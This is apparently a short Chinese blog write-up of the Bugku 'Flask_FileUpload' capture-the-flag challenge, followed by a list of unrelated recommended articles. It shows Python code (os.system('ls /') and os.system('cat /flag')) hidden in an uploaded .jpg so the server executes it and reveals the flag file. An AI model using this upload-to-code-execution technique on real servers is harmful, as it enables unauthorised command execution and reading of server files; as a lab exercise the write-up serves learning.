Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
英俊潇洒美少年8 小时前
Vue 生产环境打包:SourceMap、压缩、混淆、加密全解 + 最佳实践
前端·javascript·vue.js
小江的记录本8 小时前
【JVM虚拟机】垃圾回收GC:四种引用类型:强引用、软引用、弱引用、虚引用(附《思维导图》+《面试高频考点清单》)
java·jvm·spring boot·后端·python·spring·面试
APIshop9 小时前
Python 获取 1688 商品采集 API 接口 | 工厂货源自动化对接商品信息 | 无需选品
运维·python·自动化
巴博尔9 小时前
UNIAPP中NVUE页面 动画
android·前端·javascript·ios·uni-app
deepin_sir9 小时前
10 - 函数
开发语言·python
charlee449 小时前
《GIS基础原理与技术实践》配套案例(Python版)
python·conda·numpy·gis·环境配置
枫叶林FYL9 小时前
项目十:事件溯源仓储管理系统(WMS)仿真实现
开发语言·python
她说人狗殊途10 小时前
基于 vue-cli 创建
前端·javascript·vue.js
Chockmans11 小时前
春秋云境CVE-2020-21652(极速版)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2020-21652
AZaLEan__11 小时前
前端移动端适配与 Bootstrap
前端·bootstrap·html
热门推荐
01DeepSeek V4 + Claude Code thinking mode 400 错误修复方案02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)09OpenAI Codex Desktop App 保姆级安装教程(Windows / Mac)102026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot